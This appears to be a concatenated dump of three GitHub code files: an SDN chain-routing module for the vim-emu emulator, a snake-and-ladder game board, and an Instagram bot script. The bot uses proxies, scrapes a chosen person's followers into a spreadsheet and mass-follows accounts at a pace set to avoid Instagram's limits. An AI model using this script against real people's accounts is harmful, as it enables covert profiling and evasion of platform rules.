self.DCNetwork_graph[connected_sw][vnf_dst_name]\n            for link in link_dict:\n                if link_dict[link]['dst_port_id'] == vnf_dst_interface or \\\n                        link_dict[link]['dst_port_name'] == vnf_dst_interface:  # Fix: we might also get interface names, e.g, from a son-emu-cli call\n                    # found the right link and connected switch\n                    dst_sw = connected_sw\n                    dst_sw_outport_nr = link_dict[link]['src_port_nr']\n                    dst_sw_outport_name = link_dict[link]['src_port_name']\n                    break\n\n        # guard against a missing tag (tag=None would raise a TypeError in the comparison)\n        if tag is None or tag < 0:\n            LOG.exception('tag not valid: {0}'.format(tag))\n\n        # get shortest path\n        try:\n            # returns the first found shortest path\n            # if all shortest paths are wanted, use: all_shortest_paths\n            path = nx.shortest_path(\n                self.DCNetwork_graph, src_sw, 
dst_sw, weight=kwargs.get('weight'))\n except BaseException:\n LOG.exception(\"No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}\".format(\n vnf_src_name, vnf_dst_name, src_sw, dst_sw))\n LOG.debug(\"Graph nodes: %r\" % self.DCNetwork_graph.nodes())\n LOG.debug(\"Graph edges: %r\" % self.DCNetwork_graph.edges())\n for e, v in self.DCNetwork_graph.edges():\n LOG.debug(\"%r\" % self.DCNetwork_graph[e][v])\n return \"No path could be found between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name)\n\n LOG.debug(\"Creating path between {0} and {1}: {2}\".format(\n vnf_src_name, vnf_dst_name, path))\n\n current_hop = src_sw\n switch_inport_nr = src_sw_inport_nr\n\n cmd = kwargs.get('cmd')\n\n # iterate through the path to install the flow-entries\n for i in range(0, len(path)):\n current_node = self.getNodeByName(current_hop)\n\n if path.index(current_hop) < len(path) - 1:\n next_hop = path[path.index(current_hop) + 1]\n else:\n # last switch reached\n next_hop = vnf_dst_name\n\n next_node = self.getNodeByName(next_hop)\n\n if next_hop == vnf_dst_name:\n switch_outport_nr = dst_sw_outport_nr\n LOG.debug(\"end node reached: {0}\".format(vnf_dst_name))\n elif not isinstance(next_node, OVSSwitch):\n LOG.info(\"Next node: {0} is not a switch\".format(next_hop))\n return \"Next node: {0} is not a switch\".format(next_hop)\n else:\n # take first link between switches by default\n index_edge_out = 0\n switch_outport_nr = self.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']\n\n # set of entry via ovs-ofctl\n if isinstance(current_node, OVSSwitch):\n kwargs['vlan'] = tag\n kwargs['path'] = path\n kwargs['current_hop'] = current_hop\n kwargs['switch_inport_name'] = src_sw_inport_name\n kwargs['switch_outport_name'] = dst_sw_outport_name\n kwargs['skip_vlan_tag'] = True\n kwargs['pathindex'] = i\n\n monitor_placement = kwargs.get('monitor_placement').strip()\n # put monitor flow at the dst switch\n insert_flow = False\n # first node:\n if monitor_placement == 'tx' and path.index(current_hop) == 0:\n insert_flow = True\n # put monitoring flow at the src switch\n # last node:\n elif monitor_placement == 'rx' and path.index(current_hop) == len(path) - 1:\n insert_flow = True\n elif monitor_placement not in ['rx', 'tx']:\n LOG.exception(\n 'invalid monitor command: {0}'.format(monitor_placement))\n\n if self.controller == RemoteController and insert_flow:\n # set flow entry via ryu rest api\n self._set_flow_entry_ryu_rest(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n break\n elif insert_flow:\n # set flow entry via ovs-ofctl\n self._set_flow_entry_dpctl(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n break\n\n # take first link between switches by default\n if isinstance(next_node, OVSSwitch):\n switch_inport_nr = self.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']\n current_hop = next_hop\n\n return \"path {2} between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name, cmd)\n\n def setChain(self, vnf_src_name, vnf_dst_name,\n vnf_src_interface=None, vnf_dst_interface=None, **kwargs):\n \"\"\"\n Chain 2 vnf interfaces together by installing the flowrules in the switches along their path.\n Currently the path is found using the default networkx shortest path function.\n Each chain gets a unique vlan id , so different chains wil not interfere.\n\n :param vnf_src_name: vnf name (string)\n :param vnf_dst_name: vnf name (string)\n :param vnf_src_interface: source interface name (string)\n :param vnf_dst_interface: 
destination interface name (string)\n :param cmd: 'add-flow' (default) to add a chain, 'del-flows' to remove a chain\n :param cookie: cookie for the installed flowrules (can be used later as identifier for a set of installed chains)\n :param match: custom match entry to be added to the flowrules (default: only in_port and vlan tag)\n :param priority: custom flowrule priority\n :param monitor: boolean to indicate whether this chain is a monitoring chain\n :param tag: vlan tag to be used for this chain (pre-defined or new one if none is specified)\n :param skip_vlan_tag: boolean to indicate if a vlan tag should be appointed to this flow or not\n :param path: custom path between the two VNFs (list of switches)\n :return: output log string\n \"\"\"\n\n # special procedure for monitoring flows\n if kwargs.get('monitor'):\n\n # check if chain already exists\n found_chains = [chain_dict for chain_dict in self.installed_chains if\n (chain_dict['vnf_src_name'] == vnf_src_name and\n chain_dict['vnf_src_interface'] == vnf_src_interface and\n chain_dict['vnf_dst_name'] == vnf_dst_name and\n chain_dict['vnf_dst_interface'] == vnf_dst_interface)]\n\n if len(found_chains) > 0:\n # this chain exists, so need an extra monitoring flow\n # assume only 1 chain per vnf/interface pair\n LOG.debug('*** installing monitoring chain on top of pre-defined chain from {0}:{1} -> {2}:{3}'.\n format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface))\n tag = found_chains[0]['tag']\n ret = self._addMonitorFlow(vnf_src_name, vnf_dst_name, vnf_src_interface, vnf_dst_interface,\n tag=tag, table_id=0, **kwargs)\n return ret\n else:\n # no chain existing (or E-LAN) -> install normal chain\n LOG.warning('*** installing monitoring chain without pre-defined NSD chain from {0}:{1} -> {2}:{3}'.\n format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface))\n pass\n\n cmd = kwargs.get('cmd', 'add-flow')\n if cmd == 'add-flow' or cmd == 'del-flows':\n ret = self._chainAddFlow(\n vnf_src_name, vnf_dst_name, vnf_src_interface, vnf_dst_interface, **kwargs)\n if kwargs.get('bidirectional'):\n if kwargs.get('path') is not None:\n kwargs['path'] = list(reversed(kwargs.get('path')))\n ret = ret + '\\n' + \\\n self._chainAddFlow(\n vnf_dst_name, vnf_src_name, vnf_dst_interface, vnf_src_interface, **kwargs)\n\n else:\n ret = \"Command unknown\"\n\n return ret\n\n def _chainAddFlow(self, vnf_src_name, vnf_dst_name,\n vnf_src_interface=None, vnf_dst_interface=None, **kwargs):\n\n src_sw = None\n src_sw_inport_nr = 0\n src_sw_inport_name = None\n dst_sw = None\n dst_sw_outport_nr = 0\n dst_sw_outport_name = None\n\n LOG.debug(\"call chainAddFlow vnf_src_name=%r, vnf_src_interface=%r, vnf_dst_name=%r, vnf_dst_interface=%r\",\n vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface)\n\n # check if port is specified (vnf:port)\n if vnf_src_interface is None:\n # take first interface by default\n connected_sw = list(self.DCNetwork_graph.neighbors(vnf_src_name))[0]\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n vnf_src_interface = link_dict[0]['src_port_id']\n\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n for link in link_dict:\n if (link_dict[link]['src_port_id'] == vnf_src_interface or\n link_dict[link]['src_port_name'] == vnf_src_interface): # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n src_sw = connected_sw\n src_sw_inport_nr = 
link_dict[link]['dst_port_nr']\n src_sw_inport_name = link_dict[link]['dst_port_name']\n break\n\n if vnf_dst_interface is None:\n # take first interface by default\n connected_sw = list(self.DCNetwork_graph.neighbors(vnf_dst_name))[0]\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n vnf_dst_interface = link_dict[0]['dst_port_id']\n\n vnf_dst_name = vnf_dst_name.split(':')[0]\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_dst_name):\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n for link in link_dict:\n if link_dict[link]['dst_port_id'] == vnf_dst_interface or \\\n link_dict[link]['dst_port_name'] == vnf_dst_interface: # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n dst_sw = connected_sw\n dst_sw_outport_nr = link_dict[link]['src_port_nr']\n dst_sw_outport_name = link_dict[link]['src_port_name']\n break\n\n path = kwargs.get('path')\n if path is None:\n # get shortest path\n try:\n # returns the first found shortest path\n # if all shortest paths are wanted, use: all_shortest_paths\n path = nx.shortest_path(\n self.DCNetwork_graph, src_sw, dst_sw, weight=kwargs.get('weight'))\n except BaseException:\n LOG.exception(\"No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}\".format(\n vnf_src_name, vnf_dst_name, src_sw, dst_sw))\n LOG.debug(\"Graph nodes: %r\" % self.DCNetwork_graph.nodes())\n LOG.debug(\"Graph edges: %r\" % self.DCNetwork_graph.edges())\n for e, v in self.DCNetwork_graph.edges():\n LOG.debug(\"%r\" % self.DCNetwork_graph[e][v])\n return \"No path could be found between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name)\n\n LOG.debug(\"Creating path between {0} and {1}: {2}\".format(\n vnf_src_name, vnf_dst_name, path))\n\n current_hop = src_sw\n switch_inport_nr = src_sw_inport_nr\n\n # choose free vlan\n cmd = kwargs.get('cmd')\n vlan = None\n if cmd == 'add-flow':\n if kwargs.get('tag'):\n # use pre-defined tag\n vlan = kwargs.get('tag')\n else:\n vlan = self.vlans.pop()\n\n # store the used vlan tag to identify this chain\n if not kwargs.get('monitor'):\n chain_dict = {}\n chain_dict['vnf_src_name'] = vnf_src_name\n chain_dict['vnf_dst_name'] = vnf_dst_name\n chain_dict['vnf_src_interface'] = vnf_src_interface\n chain_dict['vnf_dst_interface'] = vnf_dst_interface\n chain_dict['tag'] = vlan\n self.installed_chains.append(chain_dict)\n\n # iterate through the path to install the flow-entries\n for i in range(0, len(path)):\n current_node = self.getNodeByName(current_hop)\n\n if i < len(path) - 1:\n next_hop = path[i + 1]\n else:\n # last switch reached\n next_hop = vnf_dst_name\n\n next_node = self.getNodeByName(next_hop)\n\n if next_hop == vnf_dst_name:\n switch_outport_nr = dst_sw_outport_nr\n LOG.debug(\"end node reached: {0}\".format(vnf_dst_name))\n elif not isinstance(next_node, OVSSwitch):\n LOG.info(\"Next node: {0} is not a switch\".format(next_hop))\n return \"Next node: {0} is not a switch\".format(next_hop)\n else:\n # take first link between switches by default\n index_edge_out = 0\n switch_outport_nr = self.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']\n\n # set OpenFlow entry\n if isinstance(current_node, OVSSwitch):\n kwargs['vlan'] = vlan\n kwargs['path'] = path\n kwargs['current_hop'] = current_hop\n kwargs['switch_inport_name'] = src_sw_inport_name\n kwargs['switch_outport_name'] = dst_sw_outport_name\n kwargs['pathindex'] = i\n\n if self.controller == RemoteController:\n # set flow entry via ryu 
rest api\n self._set_flow_entry_ryu_rest(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n else:\n # set flow entry via ovs-ofctl\n self._set_flow_entry_dpctl(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n\n # take first link between switches by default\n if isinstance(next_node, OVSSwitch):\n switch_inport_nr = self.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']\n current_hop = next_hop\n\n flow_options = {\n 'priority': kwargs.get('priority', DEFAULT_PRIORITY),\n 'cookie': kwargs.get('cookie', DEFAULT_COOKIE),\n 'vlan': kwargs['vlan'],\n 'path': kwargs['path'],\n 'match_input': kwargs.get('match')\n }\n flow_options_str = json.dumps(flow_options, indent=1)\n LOG.info(\"Installed flow rule: ({}:{}) -> ({}:{}) with options: {}\"\n .format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface, flow_options))\n return \"success: {2} between {0} and {1} with options: {3}\".format(\n vnf_src_name, vnf_dst_name, cmd, flow_options_str)\n\n def _set_flow_entry_ryu_rest(\n self, node, switch_inport_nr, switch_outport_nr, **kwargs):\n match = 'in_port=%s' % switch_inport_nr\n\n cookie = kwargs.get('cookie')\n match_input = kwargs.get('match')\n cmd = kwargs.get('cmd')\n path = kwargs.get('path')\n index = kwargs.get('pathindex')\n mod_dl_dst = kwargs.get('mod_dl_dst')\n\n vlan = kwargs.get('vlan')\n priority = kwargs.get('priority', DEFAULT_PRIORITY)\n # flag to not set the ovs port vlan tag\n skip_vlan_tag = kwargs.get('skip_vlan_tag')\n # table id to put this flowentry\n table_id = kwargs.get('table_id')\n if not table_id:\n table_id = 0\n\n s = ','\n if match_input:\n match = s.join([match, match_input])\n\n flow = {}\n flow['dpid'] = int(node.dpid, 16)\n\n if cookie:\n flow['cookie'] = int(cookie)\n if priority:\n flow['priority'] = int(priority)\n\n flow['table_id'] = table_id\n\n flow['actions'] = []\n\n # possible Ryu actions, match fields:\n # http://ryu.readthedocs.io/en/latest/app/ofctl_rest.html#add-a-flow-entry\n if cmd == 'add-flow':\n prefix = 'stats/flowentry/add'\n if vlan is not None:\n if index == 0: # first node\n # set vlan tag in ovs instance (to isolate E-LANs)\n if not skip_vlan_tag:\n in_port_name = kwargs.get('switch_inport_name')\n self._set_vlan_tag(node, in_port_name, vlan)\n # set vlan push action if more than 1 switch in the path\n if len(path) > 1:\n action = {}\n # Push a new VLAN tag if a input frame is\n # non-VLAN-tagged\n action['type'] = 'PUSH_VLAN'\n # Ethertype 0x8100(=33024): IEEE 802.1Q VLAN-tagged\n # frame\n action['ethertype'] = 33024\n flow['actions'].append(action)\n action = {}\n action['type'] = 'SET_FIELD'\n action['field'] = 'vlan_vid'\n # ryu expects the field to be masked\n action['value'] = vlan | 0x1000\n flow['actions'].append(action)\n\n elif index == len(path) - 1: # last node\n # set vlan tag in ovs instance (to isolate E-LANs)\n if not skip_vlan_tag:\n out_port_name = kwargs.get('switch_outport_name')\n self._set_vlan_tag(node, out_port_name, vlan)\n # set vlan pop action if more than 1 switch in the path\n if len(path) > 1:\n match += ',dl_vlan=%s' % vlan\n action = {}\n action['type'] = 'POP_VLAN'\n flow['actions'].append(action)\n\n else: # middle nodes\n match += ',dl_vlan=%s' % vlan\n if mod_dl_dst:\n action = {}\n action['type'] = 'SET_FIELD'\n action['field'] = 'eth_dst'\n action['value'] = mod_dl_dst\n flow['actions'].append(action)\n\n # output action must come last\n action = {}\n action['type'] = 'OUTPUT'\n action['port'] = switch_outport_nr\n 
flow['actions'].append(action)\n\n elif cmd == 'del-flows':\n prefix = 'stats/flowentry/delete'\n\n if cookie:\n # TODO: add cookie_mask as argument\n # need full mask to match complete cookie\n flow['cookie_mask'] = int('0xffffffffffffffff', 16)\n\n action = {}\n action['type'] = 'OUTPUT'\n action['port'] = switch_outport_nr\n flow['actions'].append(action)\n\n flow['match'] = self._parse_match(match)\n self.ryu_REST(prefix, data=flow)\n\n def _set_vlan_tag(self, node, switch_port, tag):\n node.vsctl('set', 'port {0} tag={1}'.format(switch_port, tag))\n LOG.debug(\"set vlan in switch: {0} in_port: {1} vlan tag: {2}\".format(\n node.name, switch_port, tag))\n\n def _set_flow_entry_dpctl(\n self, node, switch_inport_nr, switch_outport_nr, **kwargs):\n\n match = 'in_port=%s' % switch_inport_nr\n\n cookie = kwargs.get('cookie')\n match_input = kwargs.get('match')\n cmd = kwargs.get('cmd')\n path = kwargs.get('path')\n index = kwargs.get('pathindex')\n vlan = kwargs.get('vlan')\n\n s = ','\n if cookie:\n cookie = 'cookie=%s' % cookie\n match = s.join([cookie, match])\n if match_input:\n match = s.join([match, match_input])\n if cmd == 'add-flow':\n action = 'action=%s' % switch_outport_nr\n if vlan is not None:\n if index == 0: # first node\n action = ('action=mod_vlan_vid:%s' % vlan) + \\\n (',output=%s' % switch_outport_nr)\n match = '-O OpenFlow13 ' + match\n elif index == len(path) - 1: # last node\n match += ',dl_vlan=%s' % vlan\n action = 'action=strip_vlan,output=%s' % switch_outport_nr\n else: # middle nodes\n match += ',dl_vlan=%s' % vlan\n ofcmd = s.join([match, action])\n elif cmd == 'del-flows':\n ofcmd = match\n else:\n ofcmd = ''\n\n node.dpctl(cmd, ofcmd)\n LOG.info(\"{3} in switch: {0} in_port: {1} out_port: {2}\".format(node.name, switch_inport_nr,\n switch_outport_nr, cmd))\n\n # start Ryu Openflow controller as Remote Controller for the DCNetwork\n def startRyu(self, learning_switch=True):\n # start Ryu controller with rest-API\n\n # ryu default learning switch\n # ryu_learning_app = python_install_path + '/ryu/app/simple_switch_13.py'\n # custom learning switch that installs a default NORMAL action in the\n # ovs switches\n dir_path = os.path.dirname(os.path.realpath(__file__))\n ryu_learning_app = dir_path + '/son_emu_simple_switch_13.py'\n ryu_rest_app = 'ryu.app.ofctl_rest'\n # change the default Openflow controller port to 6653 (official IANA-assigned port number), as used by Mininet\n # Ryu still uses 6633 as default\n ryu_option = '--ofp-tcp-listen-port'\n ryu_of_port = '6653'\n ryu_cmd = 'ryu-manager'\n FNULL = open(\"/tmp/ryu.log\", 'w')\n if learning_switch:\n # learning and rest api\n args = [ryu_cmd, ryu_learning_app, ryu_rest_app, ryu_option, ryu_of_port]\n else:\n # no learning switch, but with rest api\n args = [ryu_cmd, ryu_rest_app, ryu_option, ryu_of_port]\n self.ryu_process = Popen(args, stdout=FNULL, stderr=FNULL)\n LOG.debug('starting ryu-controller with %s' % args)\n time.sleep(1)\n\n def killRyu(self):\n \"\"\"\n Stop the Ryu controller that might be started by son-emu.\n :return:\n \"\"\"\n # try it nicely\n try:\n if self.ryu_process is not None:\n self.ryu_process.terminate()\n self.ryu_process.kill()\n except BaseException as ex:\n LOG.warning(\"Error during Ryu stop: {}\".format(ex))\n # ensure its death ;-)\n Popen(['pkill', '-f', 'ryu-manager'])\n\n def ryu_REST(self, prefix, dpid=None, data=None):\n\n if dpid:\n url = self.ryu_REST_api + '/' + str(prefix) + '/' + str(dpid)\n else:\n url = self.ryu_REST_api + '/' + str(prefix)\n\n 
LOG.debug('sending RYU command: %s, payload: %s', url, data)\n        if data:\n            req = self.RyuSession.post(url, json=data)\n        else:\n            req = self.RyuSession.get(url)\n\n        # do extra logging if status code is not 200 (OK)\n        if req.status_code != requests.codes.ok:\n            LOG.info(\n                'type {0} encoding: {1} text: {2} headers: {3} history: {4}'.format(req.headers['content-type'],\n                                                                                    req.encoding, req.text,\n                                                                                    req.headers, req.history))\n            LOG.info('url: {0}'.format(str(url)))\n            if data:\n                LOG.info('POST: {0}'.format(str(data)))\n            LOG.info('status: {0} reason: {1}'.format(\n                req.status_code, req.reason))\n\n        if 'json' in req.headers['content-type']:\n            ret = req.json()\n            return ret\n\n        ret = req.text.rstrip()\n        return ret\n\n    # need to respect that some match fields must be integers\n    # http://ryu.readthedocs.io/en/latest/app/ofctl_rest.html#description-of-match-and-actions\n\n    def _parse_match(self, match):\n        matches = match.split(',')\n        match_dict = {}\n        for m in matches:\n            key_value = m.split('=')\n            if len(key_value) == 2:\n                try:\n                    value = int(key_value[1], 0)\n                except BaseException:\n                    value = key_value[1]\n\n                match_dict.update({key_value[0]: value})\n        return match_dict\n\n    def find_connected_dc_interface(\n            self, vnf_src_name, vnf_src_interface=None):\n\n        if vnf_src_interface is None:\n            # take first interface by default (wrap in list() since networkx 2.x returns an iterator)\n            connected_sw = list(self.DCNetwork_graph.neighbors(vnf_src_name))[0]\n            link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n            vnf_src_interface = link_dict[0]['src_port_id']\n\n        for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n            link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n            for link in link_dict:\n                if (link_dict[link]['src_port_id'] == vnf_src_interface or\n                        link_dict[link]['src_port_name'] == vnf_src_interface):\n                    # Fix: we might also get interface names, e.g, from a son-emu-cli call\n                    # found the right link and connected switch\n                    src_sw_inport_name = link_dict[link]['dst_port_name']\n                    return src_sw_inport_name\n","repo_name":"containernet/vim-emu","sub_path":"src/emuvim/dcemulator/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":42548,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"34243456973","text":"\"\"\"A module that implements the snake n ladder board of size 100 \"\"\"\n\n\nimport random\nfrom dataclasses import dataclass\nfrom snake_n_ladder.constants import BoardMeta, Ladders, Snakes, PlayerStatus, \\\n    StandardDice, DiceType\nfrom snake_n_ladder.exception import PlayerException, LadderException, \\\n    SnakeException, DiceException\n\n\n@dataclass\nclass Player:\n    \"\"\"A dataclass that represents the player details\"\"\"\n    def __init__(self, name, cell=None, status=None):\n        \"\"\"A player initializer that initializes the player\n\n        :param name: name of a player\n        :type name: str\n        :param cell: current position/cell of a player, defaults to None\n        :type cell: Cell(dataclass), optional\n        :param status: status - (PLAYING|WAITING_FOR_DICE|WINNER|LOOSER)\n        :type status: str, optional\n        \"\"\"\n        self.name = name\n        self.cell = cell\n        self.status = status\n\n\n@dataclass\nclass Cell:\n    \"\"\"A dataclass cell representing the current step, ladder-top, snake-tail\n    and the player's position holding the cell\n    \"\"\"\n    def __init__(self, current_step, ladder_top=None,\n                 snake_tail=None):\n        \"\"\"A cell initializer on the board\n\n        :param current_step: current position or the current step\n            representing the cell number\n        :type current_step: int\n        :param ladder_top: top of the ladder, defaults to None\n        :type 
ladder_top: int, optional\n        :param snake_tail: tail of the snake, defaults to None\n        :type snake_tail: int, optional\n        \"\"\"\n        self.player = None\n        self.current_step = current_step\n        self.snake_tail = snake_tail\n        self.ladder_top = ladder_top\n\n\nclass Board:\n    \"\"\"A board that represents the snake and ladder to play \"\"\"\n    def __init__(self, dice=None):\n        \"\"\"A board initializer that initializes the snake and ladder board\n\n        :param dice: type of dice NORMAL|CROOKED, defaults to None\n        :type dice: str, optional\n        \"\"\"\n        self.players = []\n        self.board = self.construct_board()\n        self.start = self.board[0]\n        self.end = self.board[-1]\n        self.dice = dice\n\n    def construct_board(self):\n        \"\"\"A method that constructs the snake and ladder board and adds ladders\n        and snakes\n\n        :return: list of cells starting off with 1 to 100\n        :rtype: list\n        \"\"\"\n        board = []\n        for cell_number in range(1, BoardMeta.SIZE.value + 1):\n            cell = Cell(cell_number)\n            board.append(cell)\n        # add ladders\n        self.add_ladders(board)\n        # add snakes\n        self.add_snakes(board)\n        return board\n\n    def create_players(self, players=None):\n        \"\"\"A method that creates the players\n\n        :param players: list of player names, defaults to None\n        :type players: list, optional\n        :return: list of players\n        :rtype: list\n        \"\"\"\n        if not players or not isinstance(players, list):\n            msg = \"Player names can not be empty\"\n            raise PlayerException(error_message=msg)\n        for name in players:\n            player = Player(name, cell=self.start, status=PlayerStatus.\n                            WAITING_FOR_DICE.value)\n            self.players.append(player)\n        return self.players\n\n    @staticmethod\n    def add_ladders(board):\n        \"\"\"A method to add ladders on the board\n\n        :param board: a list of cells representing the entire board\n        :type board: list\n        \"\"\"\n        if not board:\n            msg = \"board can not be empty\"\n            raise LadderException(error_message=msg)\n        for ladder in Ladders.LADDERS.value:\n            cell = board[ladder[0]-1]\n            cell.ladder_top = ladder[1]\n\n    @staticmethod\n    def add_snakes(board):\n        \"\"\"A method to add snakes on the board\n\n        :param board: a list of cells representing the entire board\n        :type board: list\n        \"\"\"\n        if not board:\n            msg = \"board can not be empty\"\n            raise SnakeException(error_message=msg)\n        for snake in Snakes.SNAKES.value:\n            cell = board[snake[0]-1]\n            cell.snake_tail = snake[1]\n\n    def play_dice(self):\n        \"\"\"A player throws a dice and returns a random number based\n        on the type of dice\n\n        :return: number\n        :rtype: int\n        \"\"\"\n        if self.dice == DiceType.NORMAL.value:\n            number = random.randint(StandardDice.MIN_NUMBER.value,\n                                    StandardDice.MAX_NUMBER.value)\n        elif self.dice == DiceType.CROOKED.value:\n            number = random.randrange(StandardDice.CROOKED_MIN_NUMBER.value,\n                                      StandardDice.CROOKED_MAX_NUMBER.value,\n                                      StandardDice.CROOKED_STEP.value)\n        else:\n            msg = \"{} invalid dice type\".format(self.dice)\n            raise DiceException(error_message=msg)\n        return number\n\n    def move_player_step(self, player, number):\n        \"\"\"A method that moves the player step by a number thrown by a dice\n\n        :param player: an instance of Player dataclass representing a player\n        :type player: Player\n        :param number: A number thrown by a dice\n        :type number: int\n        :return: the updated player details\n        :rtype: Player\n        \"\"\"\n        if not player or not isinstance(player, Player):\n            msg = \"Player can not be empty and must be an instance of Player\"\n            raise PlayerException(error_message=msg)\n        if number not in range(1, 7):\n            raise PlayerException(\"Invalid number thrown by the 
Player exception\")\n\n # Note: This can be moved to decorators as improvement\n # Decorators such as move_by_ladder, slip_by_snake_bite, is_winner etc\n current_step = player.cell.current_step\n next_step = current_step + number\n # check if player has reached to 100\n if next_step >= self.end.current_step:\n # player is winner\n player.status = PlayerStatus.WINNER.value\n player.cell = self.end\n return player\n # calculate the new cell as per the move\n new_cell = self.board[next_step-1]\n # check if the new cell has ladder\n if new_cell.ladder_top:\n player.cell = self.board[new_cell.ladder_top - 1]\n return player\n # check if new cell has a snake bite\n if new_cell.snake_tail:\n player.cell = self.board[new_cell.snake_tail - 1]\n return player\n # otherwise return the normal next new cell\n player.cell = new_cell\n return player\n\n def print_board(self):\n \"\"\"A print utility that prints the list of cells on the board\n representing the cells, snakes and ladder\n \"\"\"\n for cell in self.board:\n print(\"current step: {}, ladder top: {}, snake_tail: {}\".\n format(cell.current_step, cell.ladder_top, cell.snake_tail))\n","repo_name":"amolmanwar/games","sub_path":"snake_n_ladder/snake_n_ladder/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9949515457","text":"import gsheet #Librairie pour Google Sheet -> FIchier gsheet.py\nfrom instabot import Bot\nimport time\nimport random\nfrom check_proxies import check_proxy\nimport os\nimport datetime\nimport decoration\nfrom colorama import Fore, Back, Style\nimport config\n\naccount_info = config.get_config()\nusername = account_info[0]\npassword = account_info[1]\n\nif (os.path.exists(f\"config/{username}_uuid_and_cookie.json\")):\n os.remove(f\"config/{username}_uuid_and_cookie.json\")\n\nprint(decoration.logo)\nprint(\"\\n*Informations:*\")\nprint(\"Utilisateur à connecter: \", username)\nprint(\"\\n*Légende:* \")\nprint(Fore.RED, \"Consomme BEAUCOUP de requêtes (temps d'éxecution du code long)\")\nprint(Fore.YELLOW, \"Consommation MOYENNE.\")\nprint(Fore.GREEN, \"Consomme PEU de requêtes. (rapide)\", Fore.WHITE)\npersonne_cible = str(input('\\nEntrez une personne cible -> '))\n\nlist_followers = False\n\nif (os.path.exists(f\"data/{personne_cible}/followers.txt\") and os.path.exists(f\"data/{personne_cible}/following.txt\")):\n date_mod = str(datetime.datetime.fromtimestamp(os.stat(f\"data/{personne_cible}/followers.txt\").st_mtime))\n date_modification = (date_mod[0:10], date_mod[11:19])\n value = input(f\"La liste des followers a été trouvé, elle date du {date_modification[0]} à {date_modification[1]}, {Fore.RED}voulez-vous RE-lister les followers ? 
{Fore.WHITE}(oui, non): \")\n if (value.startswith(\"oui\")):\n list_followers = True\nelse:\n with open(f\"data/{personne_cible}/followers.txt\", \"w\") as f:\n f.write(\"FICHIER VIDE !\")\n with open(f\"data/{personne_cible}/following.txt\", \"w\") as f:\n f.write(\"FICHIER VIDE !\")\n\nprint(\"[INFO] Get valid proxies...\")\nwith open(\"proxies/valid_proxies.txt\", \"r\") as f:\n proxies = f.read().split('\\n')\nprint(\"[INFO] Proxies got...\")\n\nbot = Bot()\n\nprint(\"[INFO] Login...\")\nbot.login(username=username, password=password, ask_for_code=True)\n\nprint(\"CONNEXION Effectuée !\")\n\nif (list_followers):\n followers = bot.get_user_followers(personne_cible)\n following = bot.get_user_following(personne_cible)\n\n with open(f\"data/{personne_cible}/followers.txt\", \"w\") as file:\n for f in followers:\n file.write(f\"{f}\\n\")\n print(f\"[INFO] followers saved in data/{personne_cible}/followers.txt\")\n with open(f\"data/{personne_cible}/following.txt\", \"w\") as file:\n for f in following:\n file.write(f\"{f}\\n\")\n print(f\"[INFO] following saved in data/{personne_cible}/following.txt\")\nelse:\n with open(f\"data/{personne_cible}/followers.txt\", \"r\") as file:\n followers = file.read().split(\"\\n\")\n print(\"[INFO] Liste des Followers récupérée.\")\n with open(f\"data/{personne_cible}/following.txt\", \"r\") as file:\n following = file.read().split(\"\\n\")\n print(\"[INFO] Liste des Abonnements récupérée.\")\n\nnb_followers = len(followers)\n\nsave_in_sheet = input(f\"{Fore.YELLOW}Sauvegarder la liste des Followers dans le Google Sheet? {Fore.WHITE}(oui, non): \")\n\nif (save_in_sheet.startswith(\"oui\")):\n gsheet.clear_sheet()\n gsheet.insert_lines([[\"ID\", \"USERNAME\", \"YOU_FOLLOW\"]], 1)\n i = 2\n for f in followers:\n if bot.check_not_bot(f):\n you_follow = False\n f_name = bot.get_username_from_user_id(f)\n if f in following:\n you_follow = True\n gsheet.insert_lines([[f, f_name, you_follow]], i)\n i += 1\n time.sleep(random.randint(2, 4))\n else:\n print(f\"[INFO] SKIP {f} -> Bot detection\")\n\ndef follow_users(userlist):\n for f in userlist:\n bot.follow(f, True)\n\nfollow_back_users = input(f\"{Fore.RED}Suivre en retour tous les followers non suivi {Fore.WHITE}(à partir du compte @{username}){Fore.RED} sur le GoogleSheet? {Fore.WHITE}(oui, non): \")\n\nif (follow_back_users.startswith(\"oui\")):\n print(\"[INFO] FOLLOW ALL users...\")\n accounts = gsheet.get_lines()\n line = 1\n for user in accounts:\n print(user)\n if (user[2] == \"FALSE\" or user[2] == \"FAUX\"):\n print(f'FOLLOW {user}') # FOLLOW USER\n bot.follow(user[0], True)\n gsheet.update_cells(line, 3, 'VRAI')\n print(\"[INFO] Mise en pause (Pas plus de 14 abonnements par heure afin d'éviter les conflits avec Instagram...)\")\n time.sleep(60 * 60 / 14)\n line += 